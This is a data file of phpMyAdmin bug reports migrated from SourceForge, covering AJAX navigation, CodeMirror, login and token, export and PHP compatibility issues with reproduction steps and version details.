Original URL https sourceforge.net p phpmyadmin bugs 3718 Original author roccivic Found in version Latest Git","bug"
"24444","10115","Direct bookmarking and microhistory disabled in webkit.
Due to a bug in an ancient version of safari that creates an infinite loop when writing to location.hash, the direct bookmarking and microhistory features are disabled for any webkit based browser.
As this bug has already been fixed for over 6 years, I think that it would be better to attempt to detect these ancient versions only so that we can offer the above mentioned features to webkit users.
The bug in question http www.quirksmode.org bugreports archives 2005 05 Safari 13 visual anomaly with windowlocationhref.html Original URL https sourceforge.net p phpmyadmin bugs 3719 Original author roccivic Found in version Latest Git","bug"
"24444","10116","PMA sendHeaderLocation causes breakages.
PMA sendHeaderLocation can break ajax requests as it may forward a request to another page which returns HTML content rather than JSON content.
Original URL https sourceforge.net p phpmyadmin bugs 3721 Original author roccivic Found in version Latest Git","bug"
"24444","10117","No microhistory.
Features such as the user preferences pages, which rely on PMA sendHeaderLocation to work, empty the microhistory as they cause a full page reload.
The full page reload is necessary due this bug https sourceforge.net tracker ?func=detail aid=3583328 group id=23067 atid=377408 Original URL https sourceforge.net p phpmyadmin bugs 3722 Original author roccivic Found in version Latest Git","bug"
"24444","10118","Multiple codemirror instances on SQL pages.
After editing a query and hitting the back button, there are several codemirror instances on the page, but only one is expected to be there.
Original URL https sourceforge.net p phpmyadmin bugs 3723 Original author roccivic Found in version Latest Git","bug"
"24444","10119","warnings about reserved word for many non reserved words.
When I open the table structure table, many warnings about reserved words are presented The column name type is a MySQL reserved keyword.
The column name quick is a MySQL reserved keyword.
The column name text is a MySQL reserved keyword.
The column name language is a MySQL reserved keyword.
The column name status is a MySQL reserved keyword.
I don t think that all these above are mysql reserved words.
Original URL https sourceforge.net p phpmyadmin bugs 3942 Original author koubel Found in version 4.0.1","bug"
"24444","10120","Navigation fast filter hides children that it shouldn t. The fast filter in the navigation tree is recursive, but, for example, when filtering databases it will also filter out tables that don t match the search clause.
That said, sometimes it is necessary for the filter to descend several levels into the tree, for example when filtering out grouped databases.
This is a purely JS issue.
Original URL https sourceforge.net p phpmyadmin bugs 3725 Original author roccivic Found in version Latest Git","bug"
"24444","10121","refreshMain does not show the message.
PMA commonFunctions.refreshMain does not show the message in the callback.
In some instances where the refreshMain is used e.g dropping a db), no confirmation message is shown as the server response doesn t contain one.
Original URL https sourceforge.net p phpmyadmin bugs 3726 Original author roccivic Found in version Latest Git","bug"
"24444","10122","Buttons not available until page loads.
On my dev machine at home, it s not the fastest because I have other things running, and various other scripts running with my PHP that cause it to slow down.
While the page is loading which sometimes takes several seconds), the new AJAX powered buttons which seems to be all of them now) aren t available until the page fully loads.
This is slowing my work way down.
Where I used to be able to click a button before the page fully loaded, I now have to wait.
This is not a very good user experience.
It seems that PMA is heading toward a fully AJAX powered system, and I m not sure if this is a good thing.
Simply because it s not needed, but mostly because it can actually degrade the user experience if not done properly.
For me, and I know this is just my opinion, but, the only AJAX that I actually use enjoy is the edit in place for the table data, and maybe the reorder ability.
All the other AJAX things are just fluff, and they were tolerable before, but now they are actively getting in the way of me doing my job.
The reason I bring this up is because I read somewhere that the enableAJAX directive is going to be removed, which leads me to believe that PMA is heading towards a fully AJAX powered system with no ability to turn it off.
If this is the case, then the system NEEDS to be built with usability in mind, and not just using the new cool toy.
Especially for something as useful and ubiquitous at least in my line of work) as PMA.
Original URL https sourceforge.net p phpmyadmin bugs 3728 Original author benjamwelker Found in version Latest Git","bug"
"24444","10123","Code should avoid hard coded argument separator.
During the few days, I ve encountered a problem for operating PHPMyadmin at my workstation.
It is very strange situation while clicking the viewing button in PHPMyadmin.
Whenever I click the viewing button, the result is always the shown message with query was empty in PHPMyAdmin.
I ve searched for the solutions in many pages, but there are no satisfied solutions.
But I am aware of the result URL is constructed in semicolon ; ), not .
There is a little bit of difference.
For example, the sample URL is like this Notice that the red color character ) http localhost phpmyadmin index.php?db=mysql;token=2c0c27dfc21386677612120a81ae2e4a In fact, it should be displayed as the following URL http localhost phpmyadmin index.php?db=mysql token=2c0c27dfc21386677612120a81ae2e4a Thus, I review the php.ini file at my workstation.
And one configuration is added.
arg separator.input = ; It means that the argument separator is noted by ; , not .
No wander that PHPMyAdmin can not run normally because of the wrong arg separator.input.
I ve posted the more details in my blog.
http allen501pc.blogspot.tw 2012 11 php solution for message in phpmyadmin.html If one of developers discover that , fixed this bug in next minor version, please.
Original URL https sourceforge.net p phpmyadmin bugs 3733 Original author anonymous Found in version 3.5.4","bug"
"24444","10124","oddoddoddodd appearing in relation view.
This output is coming from line 445 in tbl relation.php which is echo lt;tr class= .
odd row ?
odd even .
gt; ; Though the formatting on that line is correct, none of the tr tags get that class added and the odd string it output by itself just after the legend tag in the fieldset that wraps that table.
I have a suspicion it may be a javascript issue, unless there is some kind of output filter on the PHP side.
Original URL https sourceforge.net p phpmyadmin bugs 3734 Original author coolbru Found in version Latest Git","bug"
"24444","10125","Cannot switch language in setup.
Since 3.5.x, cannot switch language in setup.
Original URL https sourceforge.net p phpmyadmin bugs 3735 Original author lem9 Found in version 3.5.4","bug"
"24444","10126","Search term is not being surrounded by single quotes.
Doing a search on a table results in Error SQL query Documentation SELECT FROM `cpg11d users` WHERE `user id` = search term ORDER BY `cpg11d users`.`user lastvisit` DESC LIMIT 0 , 30 MySQL said Documentation 1054 Unknown column search term in where clause Original URL https sourceforge.net p phpmyadmin bugs 3736 Original author adrianbj Found in version Latest Git snapshot","bug"
"24444","10127","Portuguese Language not displaying correctly.. See attached screens Original URL https sourceforge.net p phpmyadmin bugs 3737 Original author neweracracker Found in version 3.5.4","bug"
"24444","10128","Table browser with many rows has wrong page no..
When browsing a table with more than 1 page of rows, the initial value of the page number select box is wrong.
It shows the last page selected, while the first page should be selected.
The actual results are the ones from the first page.
Ought to be related to frames removal.
Original URL https sourceforge.net p phpmyadmin bugs 3738 Original author mynetx Found in version Latest Git","bug"
"24444","10129","Broken More selector in table structure.
The More selector in table structure should show all the column actions that have been hidden by shrinking the window.
Instead, it only shows Distinct values as tested in Firefox 16 under Windows XP).
Works fine in 3.5.4.
Original URL https sourceforge.net p phpmyadmin bugs 3739 Original author lem9 Found in version Latest Git","bug"
"24444","10130","PHP error in Header class.
Happens on demo server, not sure how to trigger that PHP Fatal error Call to undefined function pma generate common url ) in libraries Header.class.php on line 172 Original URL https sourceforge.net p phpmyadmin bugs 3740 Original author nijel Found in version Latest Git","bug"
"24444","10131","Git info error.
Please see attached screenshot.
The repository was cloned just over a week ago from github via https and git itself works just fine.
The file .git refs heads master really does not exist.
The file .git HEAD contains the following text ref refs heads master .
This is all I know.
The issue is reproducable, so feel free to ask any question...
Original URL https sourceforge.net p phpmyadmin bugs 3741 Original author roccivic Found in version Latest Git","bug"
"24444","10132","MaxNavigationItems issue.
The default value for this is 25.
I have a situation where the page navigator appears when I have plenty of space in the panel.
The reason is that one of the databases uses a prefix and there are about 20 databases starting with this prefix.
Original URL https sourceforge.net p phpmyadmin bugs 3742 Original author lem9 Found in version Latest Git","bug"
"24444","10133","Live charts don t work for non default server.
Similar to this phpmyadmin devel thread https sourceforge.net mailarchive message.php?msg id=27662590), the Live charts in the status tab don t seem to display for the non default MySQL server.
I m posting a bug because the thread is from more than a year ago, and indicates this has been fixed when the released version seems to be experiencing the issue still.
Original URL https sourceforge.net p phpmyadmin bugs 3743 Original author jgleicher Found in version 3.5.4","bug"
"24444","10134","Fatal error when dropping table.
To reproduce go to tbl operations.php right click and open in a new tab the Drop table link Click Yes You get a fatal PHP error see attached screenshot) I guess that PMA fillTooltip ) just doesn t belong in db info.inc.php, since it may be included more than once...
Original URL https sourceforge.net p phpmyadmin bugs 3744 Original author roccivic Found in version Latest Git","bug"
"24444","10135","Export to json escapes.
Original URL https sourceforge.net p phpmyadmin bugs 3962 Original author erikaadvisser Found in version 3.5.1","bug"
"24444","10136","In AJAX mode not all queries added to pma history table.
In AJAX mode SQL history remembers SELECT queries only.
No INSERT, DELETE, DROP, TRUNCATE nothing except for SELECT got added into history table.
Tried in many browsers makes no difference.
Everything start working as it should be only if I set cfg[ AjaxEnable ] = false; Original URL https sourceforge.net p phpmyadmin bugs 3745 Original author perlcoder Found in version 3.5.4","bug"
"24444","10137","Frames removal and horizontal scrolling.
I just noticed in Firefox 17 Windows Vista) that in current master, when my window is not wide enough, in some situations like browsing sakila.film Status gt;Monitor then horizontal scrolling mangles the navi panel.
See attached screenshot.
Original URL https sourceforge.net p phpmyadmin bugs 3746 Original author lem9 Found in version Latest Git","bug"
"24444","10138","Table with no unique table message is displayed in the wrong place.
see https sourceforge.net p phpmyadmin feature requests 1432 When executing a table optimisation, the table has no unique column message is displayed.
This should not happen at this place.
Original URL https sourceforge.net p phpmyadmin bugs 3966 Original author ruleant Found in version 4.0.2","bug"
"24444","10139","Change on selected fields in table structure does not work.
In Table gt; Structure, when selecting one or more fields and then clicking the Change action below, does not work.
A JS popup message is displayed saying loading , then the page blinks for a moment and a message No Change is displayed.
Using the the Change button of the individual field works as expected Original URL https sourceforge.net p phpmyadmin bugs 3747 Original author ruleant Found in version Latest Git","bug"
"24444","10140","Automatic open database tree in new window..
I m not sure if this is a bug, but I m sure its not a feature ; ) if you middle click a database or a table to open it in a new window it would be great to reopen the tree for the selected Database.
Even if grouped, it should open database.
Original URL https sourceforge.net p phpmyadmin bugs 3968 Original author lord rod Found in version 4.0.3","bug"
"24444","10141","Structure Snapshot on tracked view invalid SQL.
If a view gets tracked and e structure snapshot is taken from the tracking, first lines are DROP TABLE IF EXISTS `MYVIEWXYZ`; CREATE ALGORITHM=UNDEFINED DEFINER=`root` ` ` ... PMA should skip that first line and instead generate a proper view statement CREATE OR REPLACE .... VIEW ...
Original URL https sourceforge.net p phpmyadmin bugs 3748 Original author anonymous Found in version 3.5.3","bug"
"24444","10142","Missing redirection to table structure.
In the current master, after changing structure on one or multiple columns, the interface does not go back to the table structure page.
Original URL https sourceforge.net p phpmyadmin bugs 3750 Original author lem9","bug"
"24444","10143","Calendar Picker does not show up in some situations.
For a timestamp field, when editing, the calendar picker icon shows up next to a timestamp field, as expected.
BUT, if I save my edits AND THEN GO BACK TO PREVIOUS PAGE using dropdown selection), the page reloads but the calendar picker icon is no longer shown next to the timestamp field Original URL https sourceforge.net p phpmyadmin bugs 3752 Original author jimmi heiserman Found in version 3.5.4","bug"
"24444","10144","localStorage broken in server status monitor.
To reproduce go to server status monitor do something that will save the monitor settings to the localStorage rearrange charts, add a chart, change chart columns, etc...) reload the page the server status monitor errors out a No Data exception and does not initialise delete monitor settings from localStorage reload page server status monitor works again This is particularly bad, since we can t expect users to directly manipulate localStorage Original URL https sourceforge.net p phpmyadmin bugs 3753 Original author roccivic Found in version 3.5.5","bug"
"24444","10145","Clicking on advisor rules open multiple dialogs.
Steps to reproduce 1\.
Go to the advisor page and click on a rule will open a single dialog) 2\.
Click on the Advisor sub tab to refresh.
3\.
Click again on a advisor rule.
Now it will open two dialogs.
Subsequent clicks on the Advisor sub tab will increase the number of dialogs.
Original URL https sourceforge.net p phpmyadmin bugs 3754 Original author madhuracj Found in version Latest Git","bug"
"24444","10146","Display chart.
With current master, I have problems with Display chart , For example, this works fine in QA 3 5 but fails with master Browse salika.payments Click Display chart Choose a Bar chart X axis is rental id Series is amount Click on Go Original URL https sourceforge.net p phpmyadmin bugs 3755 Original author lem9 Found in version Latest Git","bug"
"24444","10147","Create table page gives errors like unknown table status TA.
Hi, Trying to create a new table the correct form is displayed, but at the bottom there are five error messages displayed in the PMA error style).
They read unknown table status TABLE TYPE To reproduce, go to the page for creating a new table on a database with existing tables, go to the bottom of the structure tab, enter a table name and number of fields).
The next page that loads, which has the form for row definitions and names, has the errors at the bottom.
Original URL https sourceforge.net p phpmyadmin bugs 3756 Original author ibennetch Found in version Latest Git","bug"
"24444","10148","Dropping database does not end.
When dropping database from Operations tab of the database), the navigation panel is updated, but not the main one and processing popup stays on page.
Original URL https sourceforge.net p phpmyadmin bugs 3757 Original author nijel Found in version Latest Git","bug"
"24444","10149","Dropping table does not reload main panel.
When dropping table from table s operations tab), the navigation panel is updated, but the main panel stays on now deleted table.
Original URL https sourceforge.net p phpmyadmin bugs 3758 Original author nijel Found in version Latest Git","bug"
"24444","10150","Renaming table does not switch to new table.
This is probably same as with deleting, but just for completness When renaming table from operations tab, the navigation panel is updated, but the main panel stays on non existing table.
Original URL https sourceforge.net p phpmyadmin bugs 3759 Original author nijel Found in version Latest Git","bug"
"24444","10151","No visual feedback on move to different database.
When moving table to different database table s opertations tab), there is absolutely no feedback and page stays on the old now not existing) table.
Original URL https sourceforge.net p phpmyadmin bugs 3760 Original author nijel Found in version Latest Git","bug"
"24444","10152","Confusing Reload Database?
message.
When renaming database database operations tab), Reload Database?
pops up.
I don t see why user would want not to reload changed database layout as the database where he was before is no longer existing, but maybe I am missing some important point, that s why I m not removing the code right now, but rather reporting this bug.
Also this shows extremly bad example of localisation as the string to translate did not include question mark, leading to incorrect translation in many languages, making the message even more confusing.
Original URL https sourceforge.net p phpmyadmin bugs 3761 Original author nijel Found in version Latest Git","bug"
"24444","10153","Broken with Drizzle.
Currently phpMyAdmin tries to issue SET CHARACTER SET utf8 ; queries on Drizzle what fails see demo server).
Original URL https sourceforge.net p phpmyadmin bugs 3978 Original author nijel Found in version Latest Git","bug"
"24444","10154","Error in config not detected.
phpMyAdmin does not give any friendly error on syntax error in config file as it used to give.
It happened to me after using short php tag with PHP 5.5.
Original URL https sourceforge.net p phpmyadmin bugs 3980 Original author nijel Found in version Latest Git","bug"
"24444","10155","Advisor broken on windows.
When I tried to run PMA on Windows, I got a PHP error when launching the advisor feature.
See attached screenshot.
Windows 8 32 bit in virtual machine XAMPP latest version from their website) PMA latest git Original URL https sourceforge.net p phpmyadmin bugs 3762 Original author roccivic Found in version Latest Git","bug"
"24444","10156","Editing a procedure with special characters.
Hi, as reported on the French forum, a procedure such as CREATE DEFINER=`root` `localhost` PROCEDURE `zz` ) begin declare xc3xa9 varchar 10); end show this in the Edit routine panel begin declare xc3x83xc2xa9 varchar 10); end Original URL https sourceforge.net p phpmyadmin bugs 3763 Original author lem9 Found in version 3.5.5","bug"
"24444","10157","Cannot insert in this table PHP < 5.4).
Reported in the French forum https sourceforge.net p phpmyadmin discussion Aide thread 4c36332c The insert panel for the following table is not displayed, when running in PHP 5.2 or 5.3, but is displayed in PHP 5.4 or 5.5.
I reproduced the problem with MySQL 5.5.31, mysqli, mysqlnd.
The same table without any ENUMs columns works fine.
Not sure whether it s a PHP or phpMyadmin bug.
CREATE TABLE abonne id int 11) NOT NULL AUTO INCREMENT, civilite enum Mr , Mme ) COLLATE utf8 unicode ci DEFAULT NULL, nom varchar 100) COLLATE utf8 unicode ci DEFAULT NULL, prenom varchar 100) COLLATE utf8 unicode ci DEFAULT NULL, adresse text COLLATE utf8 unicode ci, adresse2 text COLLATE utf8 unicode ci, dateenvoi datetime NOT NULL, cp int 11) DEFAULT NULL, ville varchar 100) COLLATE utf8 unicode ci DEFAULT NULL, mobile varchar 15) COLLATE utf8 unicode ci DEFAULT NULL, email varchar 250) COLLATE utf8 unicode ci DEFAULT NULL, bureau id int 11) DEFAULT NULL, jour enum Lundi , Mardi , Mercredi , Jeudi , Vendredi , Samedi ) COLLATE utf8 unicode ci DEFAULT NULL, sendsms int 11) NOT NULL DEFAULT 0 , infoscomplementaires text COLLATE utf8 unicode ci, ql varchar 8) COLLATE utf8 unicode ci DEFAULT NULL, etat enum A valider , Validxc3xa9 , Terminxc3xa9 ) COLLATE utf8 unicode ci NOT NULL DEFAULT A valider , user id int 11) DEFAULT NULL, datemodification datetime DEFAULT NULL, campagne id int 11) DEFAULT NULL, del tinyint 4) DEFAULT 0 , PRIMARY KEY id) ) ENGINE=InnoDB DEFAULT CHARSET=utf8 COLLATE=utf8 unicode ci; Original URL https sourceforge.net p phpmyadmin bugs 3984 Original author lem9 Found in version 4.0.4","bug"
"24444","10158","BINARY exporting error.
When exporting BINARY field, phpMyAdmin can t export binary data to readable ASCII code, so that the exported SQL can t be reloaded again.
Original URL https sourceforge.net p phpmyadmin bugs 3764 Original author zzccttu Found in version 3.5.5","bug"
"24444","10159","With mcrypt enabled I get frequent unexpected logouts.
Hi there, when mcrypt is enabled on my server I often get logged out of PMA out of nothing.
I m then redirected to the login page which shows an error I think it was 1045).
After that it is very hard sometimes impossible) to re login.
That means I will instantly get logged out and redirected to the login page with the error again.
As I use a password manager there is for sure no problem with the password.)
When I disable JavaScript the login page with the error only appears in the right content) frame while the left menu) frame is actually showing all tables as if the login would have worked.
When I try long enough and I have the feeling that changing the language speeds the process up) somtimes suddenly the login just works again.
Then I can work with PMA for some seconds to even some hours it seems totally random) until an unexpected logout again happens...
There is no error in the apache error log, nothing that would seem unusual in the access log and I couldn t find any error in any other log.
I m using phpMyAdmin 3.5.5, Apache 2.2.22, MySQL 5.5.28 0ubuntu0.12.04.3 Ubuntu), PHP 5.3.10 1ubuntu3.4, Charset is UTF 8 Unicode As soon as I disable mcrypt for the PMA domain everything works fine only there is a big warning on the home page that mcrypt is missing c Thanks for your support Original URL https sourceforge.net p phpmyadmin bugs 3765 Original author ularo Found in version 3.5.5","bug"
"24444","10160","date default timezone set not supported in PHP 5.4.x.
Location libraries common.inc.php 288 .
Nginx php fpm chroot) raise 500 HTTP error here.
Problem could be solved like if version compare PHP VERSION, 5.4.0 , lt )) \{ date default timezone set date default timezone get )); \} Original URL https sourceforge.net p phpmyadmin bugs 3766 Original author cloudsrv Found in version 2.11.9","bug"
"24444","10161","Synchronize generates improperly quoted text on UPDATE.
Attempting to synchronize databases Differences are identified properly, but the generated code does not escape single quote marks in the body of text records if an UPDATE is needed.
INSERT are formatted correctly.
The UPDATE lines are invalidly formatted and always fail.
The mismatch can make following lines fail as well.
DB source can be any system) CentOS server mysql version 5.0.95, MyISAM tables.
and also with source on the same server as target... Target DB Win7 x64 32 bit programs) Mysql 5.5.25a community, Apache 2.2.22 Win32) PHP 5.3.14, phpMyAdmin v3.5.5 also reproduced on Win XP machine with Mysql 5.1.57 community, Apache 2.2.18 Win32) PHP 5.3.14, phpMyAdmin v3.5.1 A subset problem to this is that there are no indications that the process has failed you only discover it by trying to synchronize again.
I m sure you don t need this, but...
Example attached create test DB, import attached file.
Create new empty db and synchronize test to empty one.
Tables now match.
Code used to transfer structure is shown, but not data.
edit comment in row with ID 2 from one db and then attempt to get it back using synchronize.
you will see the update statement does not escape the single quote and the update fails.
Original URL https sourceforge.net p phpmyadmin bugs 3767 Original author camerond Found in version 3.5.5","bug"
"24444","10162","Typo in german setup interface.
In setup interface URL setup index.php?page=servers mode=edit id=1 tab Server pmadb), section server= gt;configuration interface, there is a typo in a setting name instead of Kxc3xbcrzich verwendete Tabellen it should be Kxc3xbcrzlich verwendete Tabellen Recently used tables).
Original URL https sourceforge.net p phpmyadmin bugs 3769 Original author anonymous Found in version 3.5.5","bug"
"24444","10163","Executing stored procedure crash phpmyadmin.
Hi, my local system config lighttpd 1.4.32 libmysql mysqlnd 5.0.10 20111026 PHP extension mysqli PHP 5.4.10 phpmyadmin 3.5.5 all on a Archlinux 64).
browser is chromium version 23.0.1271.97 171054) I have a stored procedure that call some function.
It works fine if i cal it on the mysql cli but not under phpmyadmin The steps are 1 execute under phpmyadmin the procedure 2 enter the values 3 press go 4 phpmyadmin message Processing Request Now phpmyadmin is hangin in this Processing Request .
5 i open a terminal run mysql cli) and take a look in the tables and found all values.
6 i call the same function with different values inside mysql cli), and it works fine.
7 i exit the mysql 8 phpmyadmin is still in this Processing Request .
phpmyamin come back if i 1 restart the mysql deamon or 2 i refresh the page after some time gt;1min).
it happen only with this one procedure.
i past the code CREATE DEFINER=`xxxxxx` `localhost` PROCEDURE `PNewUser` IN `in firstname` VARCHAR 16), IN `in lastname` VARCHAR 16), IN `in email` VARCHAR 52), IN `in password` VARCHAR 32)) NO SQL COMMENT Insert a new user.
BEGIN DECLARE var uid INT 10) UNSIGNED; DECLARE var gid INT 10) UNSIGNED; DECLARE EXIT HANDLER FOR SQLEXCEPTION ROLLBACK; DECLARE EXIT HANDLER FOR SQLWARNING ROLLBACK; SET var uid = NULL; SET var gid = NULL; START TRANSACTION; SET var uid = FAddUser in firstname,in lastname,in email,in password); SET var gid = FAddGroup var uid, Private ); SELECT FAddUserGroup var uid,var gid); SELECT FSetUserGroup var uid,var gid,1,NULL,TRUE); SELECT FAddList var uid, Shopping ); COMMIT; END phpmyamdin work if call each function step by step).
I put this bug to AJAX because i think it have something todo with it ) cheers wfx.
Original URL https sourceforge.net p phpmyadmin bugs 3770 Original author wfx Found in version 3.5.5","bug"
"24444","10164","Visualize GIS data throws Fatal Error.
Fatal error Declaration of PMA GIS Point generateWkt ) must be compatible with that of PMA GIS Geometry generateWkt ) in var www html pma3.5.5 libraries gis pma gis point.php on line 259 in pma gis point.php the method declaration is public function generateWkt gis data, index, empty = ) But in pma gis geometry.php the method declaration is public function generateWkt gis data, index, empty) it doesn t have the default value for empty.
Changing it to have empty = fixes the error.
Original URL https sourceforge.net p phpmyadmin bugs 3771 Original author skookum steve Found in version 3.5.5","bug"
"24444","10165","Link to url.php does not reach destination.
If an extension is missing and a link to url.php is displayed on the login page, a click on this link just calls back phpMyAdmin.
I was able to fix in QA 3 5 by replacing common.inc.php by core.lib.php in url.php, but this did not work in master.
After the require once, GET[ url ] is empty.
Original URL https sourceforge.net p phpmyadmin bugs 3772 Original author lem9 Found in version 3.5.5","bug"
"24444","10166","Change table structure, overlay doesn t go away.
Old tracker 3601155) When editing table structure either selecting a field and clicking the change link below, or using the change link of the field > a JS popup overlay appears to edit the selected field.
When clicking save the message Loading appears, but doesn t go away, the popup overlay stays visible also.
The changes made to the field are done however.
when clicking the structure tab, to get rid of the overlay and message, the structure... ======== shamika It gives a error in firebug like this.
Error cannot call methods on dialog prior to initialization; attempted to call method close throw new Error msg ); https github.com shamika050 phpmyadmin commit 8bea49f2cee8add28876ae8272b74e42d03ef964 This would correct it.
======== roccivic Surely that line of code was put there for a good reason and commenting it out makes the whole if statement pointless.
Perhaps a better approach would be to test if the dialog has been instanciated and only close it in such case, and then remove the change column dialog element.
The patch is no good.
Original URL https sourceforge.net p phpmyadmin bugs 3774 Original author lem9 Found in version Latest Git","bug"
"24444","10167","Token mismatch on 2nd and subsequent server.
Defining a second server and logging in to it, I get a Token mismatch on all links navigation and main).
Can be reproduced on demo server.
Original URL https sourceforge.net p phpmyadmin bugs 3775 Original author roccivic Found in version Latest Git","bug"
"24444","10168","Login without auth on second server.
Tested with FF 18.
I have two MySQL servers defined, and the credentials are different from each other.
LoginCookieValidity is set to 14400.
Let s say I log in to the first, then choose the second one from the navi panel for latest git) or from main panel for 3.5.5) and log in to this one.
Then I close all browser windows.
Upon opening FF and starting PMA, I have to log in to the first server, but then I choose the second one and bam!
I m logged in.
Original URL https sourceforge.net p phpmyadmin bugs 3776 Original author lem9 Found in version 3.5.5","bug"
"24444","10169","Cannot log out from second server.
The steps to reproduce are as follows Clear all history in browser including cookies) Go to login screen and select directly the second server Log in Click the logout button You will not be logged out, the page will simply refresh Can be reproduced on demo server.
According to my bisect d6c28d3923b02e712d6c93c24e54392c66b94155 is the first bad commit commit d6c28d3923b02e712d6c93c24e54392c66b94155 Author Jo Michael <me mynetx.net> Date Sun Apr 15 01 15 30 2012 0200 Show Git revision asynchronously Original URL https sourceforge.net p phpmyadmin bugs 3777 Original author roccivic Found in version Latest Git","bug"
"24444","10170","Links in mysqli missing error message on login page.
Very simple The last link in the error message displayed when mysqli is missing in PHP contains HTML entities such that the last link is not displayed correctly in the web browser.
From the source The <a href= .
url.php?url=http 3A 2F 2Fphp.net 2Fmanual 2Fen 2Fbook.mysqli.php amp;amp;token=7ea0789bf0704a5ba666b806ab45fc80 target= Documentation ><em>mysqli< em>< a> extension is missing.
Please check your PHP configuration.
lt;a href= quot;Documentation.html faqmysql quot; target= quot;documentation quot; gt; lt;img src= quot;themes dot.gif quot; title= quot;Documentation quot; alt= quot;Documentation quot; class= quot;icon ic b help quot; gt; lt; a gt; Just replace it by The <a href= .
url.php?url=http 3A 2F 2Fphp.net 2Fmanual 2Fen 2Fbook.mysqli.php amp;amp;token=7ea0789bf0704a5ba666b806ab45fc80 target= Documentation ><em>mysqli< em>< a> extension is missing.
Please check your PHP configuration.
<a href= Documentation.html faqmysql target= documentation ><img src= themes dot.gif title= Documentation alt= Documentation class= icon ic b help >< a> and you re done.
Thanks! )
Original URL https sourceforge.net p phpmyadmin bugs 3778 Original author orangecms Found in version 3.3.10","bug"
"24444","10171","Allow aborting loading pages.
From https sourceforge.net u benjamwelker It would be helpful and appreciated if an abort call were added to the ajax powered links.
There have been a few times where I clicked the wrong link, and had to wait for the new page to fully load and become active before I could click the correct link.
With normal HTML links, if you click an incorrect link, and then quickly click the correct link before the page refreshes, it will load the new page instead.
The way it is now, the user has to wait until the new page is fully loaded and the links become active before the new, correct link can be clicked.
This fix can be achieved by running the .abort ); method on any currently running ajax requests before generating the new request.
Original URL https sourceforge.net p phpmyadmin bugs 3780 Original author roccivic Found in version Latest Git","bug"
"24444","10172","Data dictionary with no styles applied to it.
Data dictionary and database print view now opens in a new tab and have no styles applied to them.
It s better to have them open in the same tab as it was the case earlier.
Original URL https sourceforge.net p phpmyadmin bugs 3781 Original author madhuracj Found in version Latest Git","bug"
"24444","10173","Code mirrored text areas and scrollbars.
When scroll bars are present in the code mirrored text areas the code mirror text area is pushed down leaving a large blank area above it.
See the attached screenshot Original URL https sourceforge.net p phpmyadmin bugs 3782 Original author madhuracj Found in version Latest Git Attachment http sourceforge.net p phpmyadmin bugs 3782 attachment bug.png","bug"
"24444","10174","PHP 5.2 incompabilities.
Hi, looks like the latest release has some code typo When you select a database on the left menu) and see the whole list of tables, click on the Structure link of one of the tables and I get this error message in php error.log) [24 Jan 2013 07 43 01] PHP Parse error syntax error, unexpected T PAAMAYIM NEKUDOTAYIM in web xuropa.com public phpm phpm libraries DisplayResults.class.php on line 5412 [24 Jan 2013 07 43 01] PHP Stack trace [24 Jan 2013 07 43 01] PHP 1.
{main} ) web xuropa.com public phpm phpm sql.php 0 This error appears because an incorrect syntax transformation plugin getMIMESubtype ) which I replaced by transformation plugin >getMIMESubtype ) look for the 3 or 4 other similar call issues by the following command at the root path find .
name .php exec egrep n \\ [0 9a zA Z ] {} \; print Note there are 3 anti slashes in the in the bash command above but only 2 appear after submitting this ticket) Thanks JT Original URL https sourceforge.net p phpmyadmin bugs 3783 Original author djaity Found in version 4.0.0","bug"
"24444","10175","SQL textarea not refresh when execute a new request.
Select a database.
Click on SQL tab.
Write 2 SQL DELETE requests like this on the textarea DELETE FROM myTable WHERE id = 75457865 ; DELETE FROM myTable WHERE id = 75457865 ; Execute request.
But after, if you write an other request in the same textarea, like this SELECT FROM myTable; It s the previous request which is executed.
I think, the request, writing in the textarea, was not uptaded.
Best regards, Sorry for my bad english ...) Original URL https sourceforge.net p phpmyadmin bugs 4006 Original author soqrate Found in version 4.0.4","bug"
"24444","10176","Analyze option not shown for InnoDB tables.
When innodb stats on metadata is off, you need to run analyze table periodically on your tables to update information schema tables.
analyze table is not shown as a table maintenance option any more for InnoDB tables, but it should be.
http dev.mysql.com doc refman 5.5 en innodb parameters.html sysvar innodb stats on metadata Original URL https sourceforge.net p phpmyadmin bugs 4007 Original author wanderingzombie Found in version 4.0.4","bug"
"24444","10177","Confirm DROP queries does not work.
Disabling Confirm DROP queries in user preferences does not make the confirmations go away, at least on following places dropping multiple databases from database listing dropping database from its operations tab dropping table from its operations tab Original URL https sourceforge.net p phpmyadmin bugs 3784 Original author nijel Found in version Latest Git","bug"
"24444","10178","Wrong documentation links for storage engines.
Several storage engines have wrong link to documentation in server engines.php) innodb MRG MYISAM PERFORMANCE SCHEMA Original URL https sourceforge.net p phpmyadmin bugs 3785 Original author nijel Found in version Latest Git","bug"
"24444","10179","table export resets left database table navigation.
In 4.0.4.1, when I export a table, the left navigation resets its view.
I expand a database in the left navigation to see its tables.
I click on a table so it opens on the right.
On top of the right, I select Export .
I keep the defaults but chose to export as text rather than to as file.
As soon as I get the textarea with the export, the left navigation frame has all expanded items closed again.
Original URL https sourceforge.net p phpmyadmin bugs 4010 Original author ci dev Found in version 4.0.4","bug"
"24444","10180","PHP error when dropping user.
When deleting user, following error appeared on next page) Notice in .
server privileges.php 384 Undefined variable hostname Backtrace .
server privileges.php 384 PMA Error Handler >handleError integer 8, string Undefined variable hostname, string srv http pma.cihar.com master config server privileges.php, integer 384, array, ) Also it looks like backtrace information is quite wrong...
Original URL https sourceforge.net p phpmyadmin bugs 3786 Original author nijel Found in version Latest Git snapshot","bug"
"24444","10181","Erroneous LIMIT clause in prettyprinted SQL.
Execute the following SQL query and see the prettyprinted SQL SELECT FROM `sakila`.`film` LIMIT 0, 50; The pretty printed SQL is SELECT FROM `sakila`.`film` LIMIT 0, 30; Original URL https sourceforge.net p phpmyadmin bugs 3789 Original author madhuracj Found in version Latest Git","bug"
"24444","10182","Can not select text from CodeMirror text areas.
The version of CodeMirror used in latest GIT does not support text selection.
This is quite annoying and text selection was possible in the version used in 3.5 I m not sure whether some configuration in CodeMirror is causing this.
Original URL https sourceforge.net p phpmyadmin bugs 3790 Original author madhuracj Found in version Latest Git","bug"
"24444","10183","Forcing a storage engine for configuration storage.
I open a ticket, as suggested by Isaac in https sourceforge.net p phpmyadmin discussion Help thread 1bb7a3c4 ) The create tables.sql script for creating internal phpmyadmin tables forces ENGINE=MyISAM .
I think that this shouldn t be forced, and assume the default engine InnoDB), if no MyISAM specific features are needed.
Original URL https sourceforge.net p phpmyadmin bugs 4015 Original author bertitus Found in version 4.0.0","bug"
"24444","10184","Edit privileges should get rid of jQuery UI dialog.
Now that we have an AJAX page loading mechanism I do not see any need for using the jQuery UI dialog for editing privileges in the Users page.
